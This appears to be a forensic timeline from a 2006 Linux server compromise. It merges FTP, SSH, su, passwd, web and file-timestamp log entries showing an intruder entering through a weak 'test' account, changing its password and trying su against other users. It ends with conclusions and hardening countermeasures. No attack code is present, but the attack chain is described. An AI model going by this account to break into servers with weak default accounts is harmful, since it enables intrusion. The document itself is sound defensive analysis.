2006/03/09 15:01:29 82.79.137.30 30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:30 82.79.137.30 30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:34 82.79.137.6 Mar 9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6
2006/03/09 15:01:36 82.79.137.6 vsftpd: Thu Mar 9 15:01:36 2006 [pid 5944] [anonymous] FAIL LOGIN: Client "82.79.137.6"
2006/03/09 15:01:37 82.79.137.27 Mar 9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/09 15:01:39 82.79.137.27 vsftpd: Thu Mar 9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client "82.79.137.27"
2006/03/09 15:01:45 82.79.137.18 * vsftpd: Thu Mar 9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client "82.79.137.18"
2006/03/09 15:01:47 82.79.137.9 * vsftpd: Thu Mar 9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client "82.79.137.9"
2006/03/09 15:02:07 82.79.137.20 20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:08 82.79.137.20 20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:35 82.79.137.18 18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:36 82.79.137.18 18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
ratibus pts/2 82.233.38.20 Thu Mar 16 23:13 - 23:14 (00:00)
2006/03/17 00:12:32 193.230.222.209 * Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
2006/03/17 00:12:32 193.230.222.209 * Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:12 193.230.222.209 * test pts/2 193.230.222.209 Fri Mar 17 00:12 - 00:30 (00:18)
2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed
2006/03/17 00:15:35 193.230.222.209 * Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2
2006/03/17 00:15:35 193.230.222.209 * Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:15 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 00:15 - 00:15 (00:00)
2006/03/17 00:15:52 193.230.222.209 * Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test
2006/03/17 00:17:28 193.230.222.209 *. Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj
2006/03/17 00:17:30 193.230.222.209 *. Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure
2006/03/17 00:17:30 193.230.222.209 *. Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj
2006/03/17 00:17:36 193.230.222.209 *. Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj
2006/03/17 00:17:38 193.230.222.209 *. Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure
2006/03/17 00:17:38 193.230.222.209 *. Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj
2006/03/17 00:18:42 193.230.222.209 .* Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net user=croulants
2006/03/17 00:18:45 193.230.222.209 .* Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:51 193.230.222.209 .* Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:59 193.230.222.209 .* Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10 193.230.222.209 .* Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10 193.230.222.209 .* Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
2006/03/17 00:19:50 193.230.222.209 *. Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:19:52 193.230.222.209 *. Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure
2006/03/17 00:19:52 193.230.222.209 *. Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
2006/03/17 00:19:57 193.230.222.209 *. Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:19:59 193.230.222.209 *. Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure
2006/03/17 00:19:59 193.230.222.209 *. Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours
2006/03/17 00:20:04 193.230.222.209 *. Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:20:06 193.230.222.209 *. Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure
2006/03/17 00:20:06 193.230.222.209 *. Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours
2006/03/17 00:26:26 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:27 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:28 193.230.222.253 193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:28:33 193.230.222.209 * Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
2006/03/17 00:28:33 193.230.222.209 * Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:28 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 00:28 - 00:30 (00:01)
2006/03/17 00:28:40 193.230.222.209 *! Mar 17 06 00:28:40 0 ..c crw--w---- test tty /dev/pts/5
2006/03/17 00:29:02 193.230.222.209 *! Mar 17 06 00:29:02 0 .a. crw--w---- test tty /dev/pts/5
2006/03/17 00:30:31 193.230.222.209 * Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test
2006/03/17 00:30:33 193.230.222.209 * Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test
Mar 17 06 06:35:02 0 m.c prw-r----- root adm /dev/xconsole
2006/03/17 09:00:52 193.230.222.209 * Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2
2006/03/17 09:00:52 193.230.222.209 * Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 09:00 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 09:00 - 09:38 (00:37)
2006/03/17 09:03:43 193.230.222.209 *! Mar 17 06 09:03:43 0 ..c crw--w---- test tty /dev/pts/6
2006/03/17 09:03:58 193.230.222.209 *! Mar 17 06 09:03:58 0 .a. crw--w---- test tty /dev/pts/6
2006/03/17 09:38:33 193.230.222.209 * Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test
2006/03/17 12:19:43 193.230.222.209 * Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2
2006/03/17 12:19:43 193.230.222.209 * Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:19 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 12:19 - 14:25 (02:05)
2006/03/17 12:26:01 193.230.222.209 * Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2
2006/03/17 12:26:01 193.230.222.209 * Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:26 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 12:26 - 14:30 (02:04)
2006/03/17 12:32:44 193.230.222.209 * Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2
2006/03/17 12:32:44 193.230.222.209 * Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:32 193.230.222.209 * test pts/7 193.230.222.209 Fri Mar 17 12:32 - 16:26 (03:53)
2006/03/17 14:25:38 193.230.222.209 * Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test
2006/03/17 14:30:58 193.230.222.209 * Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test
2006/03/17 14:36:43 193.230.222.209 * Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2
2006/03/17 14:36:43 193.230.222.209 * Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 14:36 193.230.222.209 * test pts/3 193.230.222.209 Fri Mar 17 14:36 - 16:49 (02:12)
2006/03/17 14:59:56 193.230.222.209 * Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2
2006/03/17 14:59:56 193.230.222.209 * Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:00 193.230.222.209 * test pts/4 193.230.222.209 Fri Mar 17 15:00 - 17:12 (02:12)
2006/03/17 15:03:26 193.230.222.209 * Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2
2006/03/17 15:03:26 193.230.222.209 * Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:03 193.230.222.209 * test pts/8 193.230.222.209 Fri Mar 17 15:03 - 15:14 (00:10)
2006/03/17 15:14:06 193.230.222.209 * Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test
2006/03/17 16:26:40 193.230.222.209 * Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test
2006/03/17 16:49:15 193.230.222.209 * Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test
2006/03/17 17:12:46 193.230.222.209 * Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test
2006/03/17 17:18 # ## First mails blocked... no contact outside is possible via the default IP source
Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2
skycode pts/3 213.49.238.76 Fri Mar 17 19:30 still logged in
Mar 17 06 19:30:39 0 ..c crw--w---- skycode tty /dev/pts/3
Mar 17 19:30:50 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2
skycode pts/4 213.49.238.76 Fri Mar 17 19:33 still logged in
Mar 17 06 19:33:45 0 ..c crw--w---- skycode tty /dev/pts/4
Mar 17 19:34:41 localhost sudo: skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash
2006/03/17 19:37:19 ! Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test
Mar 17 06 19:38:16 0 ..c crw--w---- root tty /dev/pts/7
2006/03/17 19:39:21 !! Mar 17 06 19:39:21 2467 m.c -rw-r----- root shadow /etc/shadow = test:$ passwd?
2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test
2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed
2006/03/17 19:40:12 ! Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test
2006/03/17 19:40:19 ! Mar 17 06 19:40:19 4096 m.. drwxr-xr-x test test /home/test
2006/03/17 19:40:19 ! 4096 m.. drwx------ test test /home/test/.mc/cedit = test:$ mc?
2006/03/17 19:40:25 ! Mar 17 06 19:40:25 0 m.. -rw-r--r-- test test /home/test/.mc/history but test not loggued normally
2006/03/17 19:40:25 ! 35 m.. -rw-r--r-- test test /home/test/.mc/Tree or via ./go??
2006/03/17 19:40:25 ! 4096 m.. drwxr-xr-x test test /home/test/.mc
2006/03/17 19:40:25 ! 32 m.. -rw-r--r-- test test /home/test/.mc/filepos
=> /tmp/crontab.Hq7als/crontab 1;0
=> correspond to crontab -e in .bash_history?...
2006/03/17 19:40:25 ! 1945 m.. -rw-r--r-- test test /home/test/.mc/ini
2006/03/17 19:40:31 ! Mar 17 06 19:40:31 2117 m.. -rw------- test test /home/test/.bash_history
phil pts/8 85.234.194.12 Fri Mar 17 20:08 - 20:19 (00:11)
phil pts/8 85.234.194.12 Fri Mar 17 20:20 still logged in
phil pts/14 85.234.194.12 Fri Mar 17 21:14 still logged in
skycode pts/15 213.49.238.76 Fri Mar 17 21:39 still logged in
Mar 17 06 21:05:08 0 m.. crw--w---- root tty /dev/pts/12
0 m.. crw------- phil tty /dev/pts/8
Mar 17 06 21:05:09 0 m.. crw--w---- test tty /dev/pts/5
Mar 17 06 21:05:10 0 ma. crw-rw-rw- root tty /dev/ptmx
0 m.. crw--w---- test tty /dev/pts/6
0 .a. crw------- phil tty /dev/pts/8
0 .a. crw-rw-rw- root tty /dev/tty
2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1
2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1
2006/03/17 21:28:56 # Mar 17 21:28:56 localhost -- MARK --
2006/03/17 21:30:03 # last occurence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0
2006/03/17 21:30:03 # last occurence of 20060317 213003 probe ended
2006/03/17 21:45:04 # Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:45:04 # Mar 17 21:45:04 localhost last message repeated 3 times
2006/03/17 21:48:56 # ## No MARK at 21:48:56
2006/03/17 21:50:05 # Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:55 # ## No snmp at 21:55
TODO:
=====
ftp repository of test??
/var/cache/tct
Conclusions
- Initial breach
- automatic tool scanning ftp accounts could enter with the 'test' account
- manual attempt to log in with the 'test' account
- download over of sniffers and brute-force tools for ssh
- transfers over ftp
- change test password
- 82.79.137.NN = NN.metronetwork.rdsbz.ro
- 193.230.222.209 = 209-nat.s-man.net
- Counter-measures
- don't use dummy passwords ;-)
- don't grant ftp/ssh rights per default
sshd: make use of the "AllowUsers" keyword and explicitely add users when needed - don't grant internet access per default
iptables: cf --uid-owner and other --XXX-owner options
on OUTPUT table to avoid download of malicious code
on INPUT table to avoid bindshells
- Timeline
- Before and during the live forensic analysis we should have written down our own actions and the observable elements rather that having to deduce them from the logs.